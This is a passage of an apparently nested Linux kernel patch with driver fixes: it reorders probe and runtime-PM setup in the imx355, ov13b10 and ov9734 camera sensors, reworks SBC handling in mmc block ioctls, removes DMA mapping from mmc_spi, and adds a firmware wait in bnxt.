++	AD7091R_CHANNEL(1, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
++	AD7091R_CHANNEL(2, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
++	AD7091R_CHANNEL(3, 12, ad7091r_events, ARRAY_SIZE(ad7091r_events)),
+ };
+ 
+ static const struct iio_chan_spec ad7091r5_channels_noirq[] = {
+diff --git a/drivers/media/common/videobuf2/videobuf2-dma-sg.c b/drivers/media/common/videobuf2/videobuf2-dma-sg.c
+index fa69158a65b1f..cb1e4bc69dba7 100644
+--- a/drivers/media/common/videobuf2/videobuf2-dma-sg.c
++++ b/drivers/media/common/videobuf2/videobuf2-dma-sg.c
+@@ -494,9 +494,15 @@ vb2_dma_sg_dmabuf_ops_end_cpu_access(struct dma_buf *dbuf,
+ static int vb2_dma_sg_dmabuf_ops_vmap(struct dma_buf *dbuf,
+ 				      struct iosys_map *map)
+ {
+-	struct vb2_dma_sg_buf *buf = dbuf->priv;
++	struct vb2_dma_sg_buf *buf;
++	void *vaddr;
++
++	buf = dbuf->priv;
++	vaddr = vb2_dma_sg_vaddr(buf->vb, buf);
++	if (!vaddr)
++		return -EINVAL;
+ 
+-	iosys_map_set_vaddr(map, buf->vaddr);
++	iosys_map_set_vaddr(map, vaddr);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/i2c/imx355.c b/drivers/media/i2c/imx355.c
+index b46178681c056..7fb02ba560121 100644
+--- a/drivers/media/i2c/imx355.c
++++ b/drivers/media/i2c/imx355.c
+@@ -1784,10 +1784,6 @@ static int imx355_probe(struct i2c_client *client)
+ 		goto error_handler_free;
+ 	}
+ 
+-	ret = v4l2_async_register_subdev_sensor(&imx355->sd);
+-	if (ret < 0)
+-		goto error_media_entity;
+-
+ 	/*
+ 	 * Device is already turned on by i2c-core with ACPI domain PM.
+ 	 * Enable runtime PM and turn off the device.
+@@ -1796,9 +1792,15 @@ static int imx355_probe(struct i2c_client *client)
+ 	pm_runtime_enable(&client->dev);
+ 	pm_runtime_idle(&client->dev);
+ 
++	ret = v4l2_async_register_subdev_sensor(&imx355->sd);
++	if (ret < 0)
++		goto error_media_entity_runtime_pm;
++
+ 	return 0;
+ 
+-error_media_entity:
++error_media_entity_runtime_pm:
++	pm_runtime_disable(&client->dev);
++	pm_runtime_set_suspended(&client->dev);
+ 	media_entity_cleanup(&imx355->sd.entity);
+ 
+ error_handler_free:
+diff --git a/drivers/media/i2c/ov13b10.c b/drivers/media/i2c/ov13b10.c
+index 549e5d93e568e..368a3c2bfe349 100644
+--- a/drivers/media/i2c/ov13b10.c
++++ b/drivers/media/i2c/ov13b10.c
+@@ -589,6 +589,9 @@ struct ov13b10 {
+ 
+ 	/* Streaming on/off */
+ 	bool streaming;
++
++	/* True if the device has been identified */
++	bool identified;
+ };
+ 
+ #define to_ov13b10(_sd)	container_of(_sd, struct ov13b10, sd)
+@@ -1023,12 +1026,42 @@ ov13b10_set_pad_format(struct v4l2_subdev *sd,
+ 	return 0;
+ }
+ 
++/* Verify chip ID */
++static int ov13b10_identify_module(struct ov13b10 *ov13b)
++{
++	struct i2c_client *client = v4l2_get_subdevdata(&ov13b->sd);
++	int ret;
++	u32 val;
++
++	if (ov13b->identified)
++		return 0;
++
++	ret = ov13b10_read_reg(ov13b, OV13B10_REG_CHIP_ID,
++			       OV13B10_REG_VALUE_24BIT, &val);
++	if (ret)
++		return ret;
++
++	if (val != OV13B10_CHIP_ID) {
++		dev_err(&client->dev, "chip id mismatch: %x!=%x\n",
++			OV13B10_CHIP_ID, val);
++		return -EIO;
++	}
++
++	ov13b->identified = true;
++
++	return 0;
++}
++
+ static int ov13b10_start_streaming(struct ov13b10 *ov13b)
+ {
+ 	struct i2c_client *client = v4l2_get_subdevdata(&ov13b->sd);
+ 	const struct ov13b10_reg_list *reg_list;
+ 	int ret, link_freq_index;
+ 
++	ret = ov13b10_identify_module(ov13b);
++	if (ret)
++		return ret;
++
+ 	/* Get out of from software reset */
+ 	ret = ov13b10_write_reg(ov13b, OV13B10_REG_SOFTWARE_RST,
+ 				OV13B10_REG_VALUE_08BIT, OV13B10_SOFTWARE_RST);
+@@ -1144,27 +1177,6 @@ error:
+ 	return ret;
+ }
+ 
+-/* Verify chip ID */
+-static int ov13b10_identify_module(struct ov13b10 *ov13b)
+-{
+-	struct i2c_client *client = v4l2_get_subdevdata(&ov13b->sd);
+-	int ret;
+-	u32 val;
+-
+-	ret = ov13b10_read_reg(ov13b, OV13B10_REG_CHIP_ID,
+-			       OV13B10_REG_VALUE_24BIT, &val);
+-	if (ret)
+-		return ret;
+-
+-	if (val != OV13B10_CHIP_ID) {
+-		dev_err(&client->dev, "chip id mismatch: %x!=%x\n",
+-			OV13B10_CHIP_ID, val);
+-		return -EIO;
+-	}
+-
+-	return 0;
+-}
+-
+ static const struct v4l2_subdev_video_ops ov13b10_video_ops = {
+ 	.s_stream = ov13b10_set_stream,
+ };
+@@ -1379,6 +1391,7 @@ out_err:
+ static int ov13b10_probe(struct i2c_client *client)
+ {
+ 	struct ov13b10 *ov13b;
++	bool full_power;
+ 	int ret;
+ 
+ 	/* Check HW config */
+@@ -1395,11 +1408,14 @@ static int ov13b10_probe(struct i2c_client *client)
+ 	/* Initialize subdev */
+ 	v4l2_i2c_subdev_init(&ov13b->sd, client, &ov13b10_subdev_ops);
+ 
+-	/* Check module identity */
+-	ret = ov13b10_identify_module(ov13b);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to find sensor: %d\n", ret);
+-		return ret;
++	full_power = acpi_dev_state_d0(&client->dev);
++	if (full_power) {
++		/* Check module identity */
++		ret = ov13b10_identify_module(ov13b);
++		if (ret) {
++			dev_err(&client->dev, "failed to find sensor: %d\n", ret);
++			return ret;
++		}
+ 	}
+ 
+ 	/* Set default mode to max resolution */
+@@ -1423,21 +1439,27 @@ static int ov13b10_probe(struct i2c_client *client)
+ 		goto error_handler_free;
+ 	}
+ 
+-	ret = v4l2_async_register_subdev_sensor(&ov13b->sd);
+-	if (ret < 0)
+-		goto error_media_entity;
+ 
+ 	/*
+ 	 * Device is already turned on by i2c-core with ACPI domain PM.
+ 	 * Enable runtime PM and turn off the device.
+ 	 */
+-	pm_runtime_set_active(&client->dev);
++	/* Set the device's state to active if it's in D0 state. */
++	if (full_power)
++		pm_runtime_set_active(&client->dev);
+ 	pm_runtime_enable(&client->dev);
+ 	pm_runtime_idle(&client->dev);
+ 
++	ret = v4l2_async_register_subdev_sensor(&ov13b->sd);
++	if (ret < 0)
++		goto error_media_entity_runtime_pm;
++
+ 	return 0;
+ 
+-error_media_entity:
++error_media_entity_runtime_pm:
++	pm_runtime_disable(&client->dev);
++	if (full_power)
++		pm_runtime_set_suspended(&client->dev);
+ 	media_entity_cleanup(&ov13b->sd.entity);
+ 
+ error_handler_free:
+@@ -1457,6 +1479,7 @@ static void ov13b10_remove(struct i2c_client *client)
+ 	ov13b10_free_controls(ov13b);
+ 
+ 	pm_runtime_disable(&client->dev);
++	pm_runtime_set_suspended(&client->dev);
+ }
+ 
+ static const struct dev_pm_ops ov13b10_pm_ops = {
+@@ -1480,6 +1503,7 @@ static struct i2c_driver ov13b10_i2c_driver = {
+ 	},
+ 	.probe_new = ov13b10_probe,
+ 	.remove = ov13b10_remove,
++	.flags = I2C_DRV_ACPI_WAIVE_D0_PROBE,
+ };
+ 
+ module_i2c_driver(ov13b10_i2c_driver);
+diff --git a/drivers/media/i2c/ov9734.c b/drivers/media/i2c/ov9734.c
+index 8b0a158cb2972..c5592ddb0cffb 100644
+--- a/drivers/media/i2c/ov9734.c
++++ b/drivers/media/i2c/ov9734.c
+@@ -939,6 +939,7 @@ static void ov9734_remove(struct i2c_client *client)
+ 	media_entity_cleanup(&sd->entity);
+ 	v4l2_ctrl_handler_free(sd->ctrl_handler);
+ 	pm_runtime_disable(&client->dev);
++	pm_runtime_set_suspended(&client->dev);
+ 	mutex_destroy(&ov9734->mutex);
+ }
+ 
+@@ -984,13 +985,6 @@ static int ov9734_probe(struct i2c_client *client)
+ 		goto probe_error_v4l2_ctrl_handler_free;
+ 	}
+ 
+-	ret = v4l2_async_register_subdev_sensor(&ov9734->sd);
+-	if (ret < 0) {
+-		dev_err(&client->dev, "failed to register V4L2 subdev: %d",
+-			ret);
+-		goto probe_error_media_entity_cleanup;
+-	}
+-
+ 	/*
+ 	 * Device is already turned on by i2c-core with ACPI domain PM.
+ 	 * Enable runtime PM and turn off the device.
+@@ -999,9 +993,18 @@ static int ov9734_probe(struct i2c_client *client)
+ 	pm_runtime_enable(&client->dev);
+ 	pm_runtime_idle(&client->dev);
+ 
++	ret = v4l2_async_register_subdev_sensor(&ov9734->sd);
++	if (ret < 0) {
++		dev_err(&client->dev, "failed to register V4L2 subdev: %d",
++			ret);
++		goto probe_error_media_entity_cleanup_pm;
++	}
++
+ 	return 0;
+ 
+-probe_error_media_entity_cleanup:
++probe_error_media_entity_cleanup_pm:
++	pm_runtime_disable(&client->dev);
++	pm_runtime_set_suspended(&client->dev);
+ 	media_entity_cleanup(&ov9734->sd.entity);
+ 
+ probe_error_v4l2_ctrl_handler_free:
+diff --git a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+index 3071b61946c3b..f911d3c7dd862 100644
+--- a/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
++++ b/drivers/media/platform/mediatek/jpeg/mtk_jpeg_core.c
+@@ -974,13 +974,13 @@ static void mtk_jpeg_dec_device_run(void *priv)
+ 	if (ret < 0)
+ 		goto dec_end;
+ 
+-	schedule_delayed_work(&jpeg->job_timeout_work,
+-			      msecs_to_jiffies(MTK_JPEG_HW_TIMEOUT_MSEC));
+-
+ 	mtk_jpeg_set_dec_src(ctx, &src_buf->vb2_buf, &bs);
+ 	if (mtk_jpeg_set_dec_dst(ctx, &jpeg_src_buf->dec_param, &dst_buf->vb2_buf, &fb))
+ 		goto dec_end;
+ 
++	schedule_delayed_work(&jpeg->job_timeout_work,
++			      msecs_to_jiffies(MTK_JPEG_HW_TIMEOUT_MSEC));
++
+ 	spin_lock_irqsave(&jpeg->hw_lock, flags);
+ 	mtk_jpeg_dec_reset(jpeg->reg_base);
+ 	mtk_jpeg_dec_set_config(jpeg->reg_base,
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index e9ce53d200bc1..ea60efaecb0dd 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -402,6 +402,10 @@ struct mmc_blk_ioc_data {
+ 	struct mmc_ioc_cmd ic;
+ 	unsigned char *buf;
+ 	u64 buf_bytes;
++	unsigned int flags;
++#define MMC_BLK_IOC_DROP	BIT(0)	/* drop this mrq */
++#define MMC_BLK_IOC_SBC	BIT(1)	/* use mrq.sbc */
++
+ 	struct mmc_rpmb_data *rpmb;
+ };
+ 
+@@ -467,7 +471,7 @@ static int mmc_blk_ioctl_copy_to_user(struct mmc_ioc_cmd __user *ic_ptr,
+ }
+ 
+ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+-			       struct mmc_blk_ioc_data *idata)
++			       struct mmc_blk_ioc_data **idatas, int i)
+ {
+ 	struct mmc_command cmd = {}, sbc = {};
+ 	struct mmc_data data = {};
+@@ -477,10 +481,18 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	unsigned int busy_timeout_ms;
+ 	int err;
+ 	unsigned int target_part;
++	struct mmc_blk_ioc_data *idata = idatas[i];
++	struct mmc_blk_ioc_data *prev_idata = NULL;
+ 
+ 	if (!card || !md || !idata)
+ 		return -EINVAL;
+ 
++	if (idata->flags & MMC_BLK_IOC_DROP)
++		return 0;
++
++	if (idata->flags & MMC_BLK_IOC_SBC)
++		prev_idata = idatas[i - 1];
++
+ 	/*
+ 	 * The RPMB accesses comes in from the character device, so we
+ 	 * need to target these explicitly. Else we just target the
+@@ -547,7 +559,7 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 			return err;
+ 	}
+ 
+-	if (idata->rpmb) {
++	if (idata->rpmb || prev_idata) {
+ 		sbc.opcode = MMC_SET_BLOCK_COUNT;
+ 		/*
+ 		 * We don't do any blockcount validation because the max size
+@@ -555,6 +567,8 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 		 * 'Reliable Write' bit here.
+ 		 */
+ 		sbc.arg = data.blocks | (idata->ic.write_flag & BIT(31));
++		if (prev_idata)
++			sbc.arg = prev_idata->ic.arg;
+ 		sbc.flags = MMC_RSP_R1 | MMC_CMD_AC;
+ 		mrq.sbc = &sbc;
+ 	}
+@@ -572,6 +586,15 @@ static int __mmc_blk_ioctl_cmd(struct mmc_card *card, struct mmc_blk_data *md,
+ 	mmc_wait_for_req(card->host, &mrq);
+ 	memcpy(&idata->ic.response, cmd.resp, sizeof(cmd.resp));
+ 
++	if (prev_idata) {
++		memcpy(&prev_idata->ic.response, sbc.resp, sizeof(sbc.resp));
++		if (sbc.error) {
++			dev_err(mmc_dev(card->host), "%s: sbc error %d\n",
++							__func__, sbc.error);
++			return sbc.error;
++		}
++	}
++
+ 	if (cmd.error) {
+ 		dev_err(mmc_dev(card->host), "%s: cmd error %d\n",
+ 						__func__, cmd.error);
+@@ -1057,6 +1080,20 @@ static inline void mmc_blk_reset_success(struct mmc_blk_data *md, int type)
+ 	md->reset_done &= ~type;
+ }
+ 
++static void mmc_blk_check_sbc(struct mmc_queue_req *mq_rq)
++{
++	struct mmc_blk_ioc_data **idata = mq_rq->drv_op_data;
++	int i;
++
++	for (i = 1; i < mq_rq->ioc_count; i++) {
++		if (idata[i - 1]->ic.opcode == MMC_SET_BLOCK_COUNT &&
++		    mmc_op_multi(idata[i]->ic.opcode)) {
++			idata[i - 1]->flags |= MMC_BLK_IOC_DROP;
++			idata[i]->flags |= MMC_BLK_IOC_SBC;
++		}
++	}
++}
++
+ /*
+  * The non-block commands come back from the block layer after it queued it and
+  * processed it with all other requests and then they get issued in this
+@@ -1084,11 +1121,14 @@ static void mmc_blk_issue_drv_op(struct mmc_queue *mq, struct request *req)
+ 			if (ret)
+ 				break;
+ 		}
++
++		mmc_blk_check_sbc(mq_rq);
++
+ 		fallthrough;
+ 	case MMC_DRV_OP_IOCTL_RPMB:
+ 		idata = mq_rq->drv_op_data;
+ 		for (i = 0, ret = 0; i < mq_rq->ioc_count; i++) {
+-			ret = __mmc_blk_ioctl_cmd(card, md, idata[i]);
++			ret = __mmc_blk_ioctl_cmd(card, md, idata, i);
+ 			if (ret)
+ 				break;
+ 		}
+diff --git a/drivers/mmc/host/mmc_spi.c b/drivers/mmc/host/mmc_spi.c
+index cc333ad67cac8..2a99ffb61f8c0 100644
+--- a/drivers/mmc/host/mmc_spi.c
++++ b/drivers/mmc/host/mmc_spi.c
+@@ -15,7 +15,7 @@
+ #include <linux/slab.h>
+ #include <linux/module.h>
+ #include <linux/bio.h>
+-#include <linux/dma-mapping.h>
++#include <linux/dma-direction.h>
+ #include <linux/crc7.h>
+ #include <linux/crc-itu-t.h>
+ #include <linux/scatterlist.h>
+@@ -119,19 +119,14 @@ struct mmc_spi_host {
+ 	struct spi_transfer	status;
+ 	struct spi_message	readback;
+ 
+-	/* underlying DMA-aware controller, or null */
+-	struct device		*dma_dev;
+-
+ 	/* buffer used for commands and for message "overhead" */
+ 	struct scratch		*data;
+-	dma_addr_t		data_dma;
+ 
+ 	/* Specs say to write ones most of the time, even when the card
+ 	 * has no need to read its input data; and many cards won't care.
+ 	 * This is our source of those ones.
+ 	 */
+ 	void			*ones;
+-	dma_addr_t		ones_dma;
+ };
+ 
+ 
+@@ -147,11 +142,8 @@ static inline int mmc_cs_off(struct mmc_spi_host *host)
+ 	return spi_setup(host->spi);
+ }
+ 
+-static int
+-mmc_spi_readbytes(struct mmc_spi_host *host, unsigned len)
++static int mmc_spi_readbytes(struct mmc_spi_host *host, unsigned int len)
+ {
+-	int status;
+-
+ 	if (len > sizeof(*host->data)) {
+ 		WARN_ON(1);
+ 		return -EIO;
+@@ -159,19 +151,7 @@ mmc_spi_readbytes(struct mmc_spi_host *host, unsigned len)
+ 
+ 	host->status.len = len;
+ 
+-	if (host->dma_dev)
+-		dma_sync_single_for_device(host->dma_dev,
+-				host->data_dma, sizeof(*host->data),
+-				DMA_FROM_DEVICE);
+-
+-	status = spi_sync_locked(host->spi, &host->readback);
+-
+-	if (host->dma_dev)
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				host->data_dma, sizeof(*host->data),
+-				DMA_FROM_DEVICE);
+-
+-	return status;
++	return spi_sync_locked(host->spi, &host->readback);
+ }
+ 
+ static int mmc_spi_skip(struct mmc_spi_host *host, unsigned long timeout,
+@@ -506,23 +486,11 @@ mmc_spi_command_send(struct mmc_spi_host *host,
+ 	t = &host->t;
+ 	memset(t, 0, sizeof(*t));
+ 	t->tx_buf = t->rx_buf = data->status;
+-	t->tx_dma = t->rx_dma = host->data_dma;
+ 	t->len = cp - data->status;
+ 	t->cs_change = 1;
+ 	spi_message_add_tail(t, &host->m);
+ 
+-	if (host->dma_dev) {
+-		host->m.is_dma_mapped = 1;
+-		dma_sync_single_for_device(host->dma_dev,
+-				host->data_dma, sizeof(*host->data),
+-				DMA_BIDIRECTIONAL);
+-	}
+ 	status = spi_sync_locked(host->spi, &host->m);
+-
+-	if (host->dma_dev)
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				host->data_dma, sizeof(*host->data),
+-				DMA_BIDIRECTIONAL);
+ 	if (status < 0) {
+ 		dev_dbg(&host->spi->dev, "  ... write returned %d\n", status);
+ 		cmd->error = status;
+@@ -540,9 +508,6 @@ mmc_spi_command_send(struct mmc_spi_host *host,
+  * We always provide TX data for data and CRC.  The MMC/SD protocol
+  * requires us to write ones; but Linux defaults to writing zeroes;
+  * so we explicitly initialize it to all ones on RX paths.
+- *
+- * We also handle DMA mapping, so the underlying SPI controller does
+- * not need to (re)do it for each message.
+  */
+ static void
+ mmc_spi_setup_data_message(
+@@ -552,11 +517,8 @@ mmc_spi_setup_data_message(
+ {
+ 	struct spi_transfer	*t;
+ 	struct scratch		*scratch = host->data;
+-	dma_addr_t		dma = host->data_dma;
+ 
+ 	spi_message_init(&host->m);
+-	if (dma)
+-		host->m.is_dma_mapped = 1;
+ 
+ 	/* for reads, readblock() skips 0xff bytes before finding
+ 	 * the token; for writes, this transfer issues that token.
+@@ -570,8 +532,6 @@ mmc_spi_setup_data_message(
+ 		else
+ 			scratch->data_token = SPI_TOKEN_SINGLE;
+ 		t->tx_buf = &scratch->data_token;
+-		if (dma)
+-			t->tx_dma = dma + offsetof(struct scratch, data_token);
+ 		spi_message_add_tail(t, &host->m);
+ 	}
+ 
+@@ -581,7 +541,6 @@ mmc_spi_setup_data_message(
+ 	t = &host->t;
+ 	memset(t, 0, sizeof(*t));
+ 	t->tx_buf = host->ones;
+-	t->tx_dma = host->ones_dma;
+ 	/* length and actual buffer info are written later */
+ 	spi_message_add_tail(t, &host->m);
+ 
+@@ -591,14 +550,9 @@ mmc_spi_setup_data_message(
+ 	if (direction == DMA_TO_DEVICE) {
+ 		/* the actual CRC may get written later */
+ 		t->tx_buf = &scratch->crc_val;
+-		if (dma)
+-			t->tx_dma = dma + offsetof(struct scratch, crc_val);
+ 	} else {
+ 		t->tx_buf = host->ones;
+-		t->tx_dma = host->ones_dma;
+ 		t->rx_buf = &scratch->crc_val;
+-		if (dma)
+-			t->rx_dma = dma + offsetof(struct scratch, crc_val);
+ 	}
+ 	spi_message_add_tail(t, &host->m);
+ 
+@@ -621,10 +575,7 @@ mmc_spi_setup_data_message(
+ 		memset(t, 0, sizeof(*t));
+ 		t->len = (direction == DMA_TO_DEVICE) ? sizeof(scratch->status) : 1;
+ 		t->tx_buf = host->ones;
+-		t->tx_dma = host->ones_dma;
+ 		t->rx_buf = scratch->status;
+-		if (dma)
+-			t->rx_dma = dma + offsetof(struct scratch, status);
+ 		t->cs_change = 1;
+ 		spi_message_add_tail(t, &host->m);
+ 	}
+@@ -653,23 +604,13 @@ mmc_spi_writeblock(struct mmc_spi_host *host, struct spi_transfer *t,
+ 
+ 	if (host->mmc->use_spi_crc)
+ 		scratch->crc_val = cpu_to_be16(crc_itu_t(0, t->tx_buf, t->len));
+-	if (host->dma_dev)
+-		dma_sync_single_for_device(host->dma_dev,
+-				host->data_dma, sizeof(*scratch),
+-				DMA_BIDIRECTIONAL);
+ 
+ 	status = spi_sync_locked(spi, &host->m);
+-
+ 	if (status != 0) {
+ 		dev_dbg(&spi->dev, "write error (%d)\n", status);
+ 		return status;
+ 	}
+ 
+-	if (host->dma_dev)
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				host->data_dma, sizeof(*scratch),
+-				DMA_BIDIRECTIONAL);
+-
+ 	/*
+ 	 * Get the transmission data-response reply.  It must follow
+ 	 * immediately after the data block we transferred.  This reply
+@@ -718,8 +659,6 @@ mmc_spi_writeblock(struct mmc_spi_host *host, struct spi_transfer *t,
+ 	}
+ 
+ 	t->tx_buf += t->len;
+-	if (host->dma_dev)
+-		t->tx_dma += t->len;
+ 
+ 	/* Return when not busy.  If we didn't collect that status yet,
+ 	 * we'll need some more I/O.
+@@ -783,30 +722,12 @@ mmc_spi_readblock(struct mmc_spi_host *host, struct spi_transfer *t,
+ 	}
+ 	leftover = status << 1;
+ 
+-	if (host->dma_dev) {
+-		dma_sync_single_for_device(host->dma_dev,
+-				host->data_dma, sizeof(*scratch),
+-				DMA_BIDIRECTIONAL);
+-		dma_sync_single_for_device(host->dma_dev,
+-				t->rx_dma, t->len,
+-				DMA_FROM_DEVICE);
+-	}
+-
+ 	status = spi_sync_locked(spi, &host->m);
+ 	if (status < 0) {
+ 		dev_dbg(&spi->dev, "read error %d\n", status);
+ 		return status;
+ 	}
+ 
+-	if (host->dma_dev) {
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				host->data_dma, sizeof(*scratch),
+-				DMA_BIDIRECTIONAL);
+-		dma_sync_single_for_cpu(host->dma_dev,
+-				t->rx_dma, t->len,
+-				DMA_FROM_DEVICE);
+-	}
+-
+ 	if (bitshift) {
+ 		/* Walk through the data and the crc and do
+ 		 * all the magic to get byte-aligned data.
+@@ -841,8 +762,6 @@ mmc_spi_readblock(struct mmc_spi_host *host, struct spi_transfer *t,
+ 	}
+ 
+ 	t->rx_buf += t->len;
+-	if (host->dma_dev)
+-		t->rx_dma += t->len;
+ 
+ 	return 0;
+ }
+@@ -857,7 +776,6 @@ mmc_spi_data_do(struct mmc_spi_host *host, struct mmc_command *cmd,
+ 		struct mmc_data *data, u32 blk_size)
+ {
+ 	struct spi_device	*spi = host->spi;
+-	struct device		*dma_dev = host->dma_dev;
+ 	struct spi_transfer	*t;
+ 	enum dma_data_direction	direction = mmc_get_dma_dir(data);
+ 	struct scatterlist	*sg;
+@@ -884,31 +802,8 @@ mmc_spi_data_do(struct mmc_spi_host *host, struct mmc_command *cmd,
+ 	 */
+ 	for_each_sg(data->sg, sg, data->sg_len, n_sg) {
+ 		int			status = 0;
+-		dma_addr_t		dma_addr = 0;
+ 		void			*kmap_addr;
+ 		unsigned		length = sg->length;
+-		enum dma_data_direction	dir = direction;
+-
+-		/* set up dma mapping for controller drivers that might
+-		 * use DMA ... though they may fall back to PIO
+-		 */
+-		if (dma_dev) {
+-			/* never invalidate whole *shared* pages ... */
+-			if ((sg->offset != 0 || length != PAGE_SIZE)
+-					&& dir == DMA_FROM_DEVICE)
+-				dir = DMA_BIDIRECTIONAL;
+-
+-			dma_addr = dma_map_page(dma_dev, sg_page(sg), 0,
+-						PAGE_SIZE, dir);
+-			if (dma_mapping_error(dma_dev, dma_addr)) {
+-				data->error = -EFAULT;
+-				break;
+-			}
+-			if (direction == DMA_TO_DEVICE)
+-				t->tx_dma = dma_addr + sg->offset;
+-			else
+-				t->rx_dma = dma_addr + sg->offset;
+-		}
+ 
+ 		/* allow pio too; we don't allow highmem */
+ 		kmap_addr = kmap(sg_page(sg));
+@@ -941,8 +836,6 @@ mmc_spi_data_do(struct mmc_spi_host *host, struct mmc_command *cmd,
+ 		if (direction == DMA_FROM_DEVICE)
+ 			flush_dcache_page(sg_page(sg));
+ 		kunmap(sg_page(sg));
+-		if (dma_dev)
+-			dma_unmap_page(dma_dev, dma_addr, PAGE_SIZE, dir);
+ 
+ 		if (status < 0) {
+ 			data->error = status;
+@@ -977,21 +870,9 @@ mmc_spi_data_do(struct mmc_spi_host *host, struct mmc_command *cmd,
+ 		scratch->status[0] = SPI_TOKEN_STOP_TRAN;
+ 
+ 		host->early_status.tx_buf = host->early_status.rx_buf;
+-		host->early_status.tx_dma = host->early_status.rx_dma;
+ 		host->early_status.len = statlen;
+ 
+-		if (host->dma_dev)
+-			dma_sync_single_for_device(host->dma_dev,
+-					host->data_dma, sizeof(*scratch),
+-					DMA_BIDIRECTIONAL);
+-
+ 		tmp = spi_sync_locked(spi, &host->m);
+-
+-		if (host->dma_dev)
+-			dma_sync_single_for_cpu(host->dma_dev,
+-					host->data_dma, sizeof(*scratch),
+-					DMA_BIDIRECTIONAL);
+-
+ 		if (tmp < 0) {
+ 			if (!data->error)
+ 				data->error = tmp;
+@@ -1265,52 +1146,6 @@ mmc_spi_detect_irq(int irq, void *mmc)
+ 	return IRQ_HANDLED;
+ }
+ 
+-#ifdef CONFIG_HAS_DMA
+-static int mmc_spi_dma_alloc(struct mmc_spi_host *host)
+-{
+-	struct spi_device *spi = host->spi;
+-	struct device *dev;
+-
+-	if (!spi->master->dev.parent->dma_mask)
+-		return 0;
+-
+-	dev = spi->master->dev.parent;
+-
+-	host->ones_dma = dma_map_single(dev, host->ones, MMC_SPI_BLOCKSIZE,
+-					DMA_TO_DEVICE);
+-	if (dma_mapping_error(dev, host->ones_dma))
+-		return -ENOMEM;
+-
+-	host->data_dma = dma_map_single(dev, host->data, sizeof(*host->data),
+-					DMA_BIDIRECTIONAL);
+-	if (dma_mapping_error(dev, host->data_dma)) {
+-		dma_unmap_single(dev, host->ones_dma, MMC_SPI_BLOCKSIZE,
+-				 DMA_TO_DEVICE);
+-		return -ENOMEM;
+-	}
+-
+-	dma_sync_single_for_cpu(dev, host->data_dma, sizeof(*host->data),
+-				DMA_BIDIRECTIONAL);
+-
+-	host->dma_dev = dev;
+-	return 0;
+-}
+-
+-static void mmc_spi_dma_free(struct mmc_spi_host *host)
+-{
+-	if (!host->dma_dev)
+-		return;
+-
+-	dma_unmap_single(host->dma_dev, host->ones_dma, MMC_SPI_BLOCKSIZE,
+-			 DMA_TO_DEVICE);
+-	dma_unmap_single(host->dma_dev, host->data_dma,	sizeof(*host->data),
+-			 DMA_BIDIRECTIONAL);
+-}
+-#else
+-static inline int mmc_spi_dma_alloc(struct mmc_spi_host *host) { return 0; }
+-static inline void mmc_spi_dma_free(struct mmc_spi_host *host) {}
+-#endif
+-
+ static int mmc_spi_probe(struct spi_device *spi)
+ {
+ 	void			*ones;
+@@ -1402,24 +1237,17 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 			host->powerup_msecs = 250;
+ 	}
+ 
+-	/* preallocate dma buffers */
++	/* Preallocate buffers */
+ 	host->data = kmalloc(sizeof(*host->data), GFP_KERNEL);
+ 	if (!host->data)
+ 		goto fail_nobuf1;
+ 
+-	status = mmc_spi_dma_alloc(host);
+-	if (status)
+-		goto fail_dma;
+-
+ 	/* setup message for status/busy readback */
+ 	spi_message_init(&host->readback);
+-	host->readback.is_dma_mapped = (host->dma_dev != NULL);
+ 
+ 	spi_message_add_tail(&host->status, &host->readback);
+ 	host->status.tx_buf = host->ones;
+-	host->status.tx_dma = host->ones_dma;
+ 	host->status.rx_buf = &host->data->status;
+-	host->status.rx_dma = host->data_dma + offsetof(struct scratch, status);
+ 	host->status.cs_change = 1;
+ 
+ 	/* register card detect irq */
+@@ -1464,9 +1292,8 @@ static int mmc_spi_probe(struct spi_device *spi)
+ 	if (!status)
+ 		has_ro = true;
+ 
+-	dev_info(&spi->dev, "SD/MMC host %s%s%s%s%s\n",
++	dev_info(&spi->dev, "SD/MMC host %s%s%s%s\n",
+ 			dev_name(&mmc->class_dev),
+-			host->dma_dev ? "" : ", no DMA",
+ 			has_ro ? "" : ", no WP",
+ 			(host->pdata && host->pdata->setpower)
+ 				? "" : ", no poweroff",
+@@ -1477,8 +1304,6 @@ static int mmc_spi_probe(struct spi_device *spi)
+ fail_gpiod_request:
+ 	mmc_remove_host(mmc);
+ fail_glue_init:
+-	mmc_spi_dma_free(host);
+-fail_dma:
+ 	kfree(host->data);
+ fail_nobuf1:
+ 	mmc_spi_put_pdata(spi);
+@@ -1500,7 +1325,6 @@ static void mmc_spi_remove(struct spi_device *spi)
+ 
+ 	mmc_remove_host(mmc);
+ 
+-	mmc_spi_dma_free(host);
+ 	kfree(host->data);
+ 	kfree(host->ones);
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index df4d88d35701b..f810b5dc25f01 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -12269,6 +12269,11 @@ static int bnxt_fw_init_one_p1(struct bnxt *bp)
+ 
+ 	bp->fw_cap = 0;
+ 	rc = bnxt_hwrm_ver_get(bp);
++	/* FW may be unresponsive after FLR. FLR must complete within 100 msec
++	 * so wait before continuing with recovery.
++	 */
++	if (rc)
++		msleep(100);
+ 	bnxt_try_map_fw_health_reg(bp);
+ 	if (rc) {
+ 		rc = bnxt_try_recover_fw(bp);
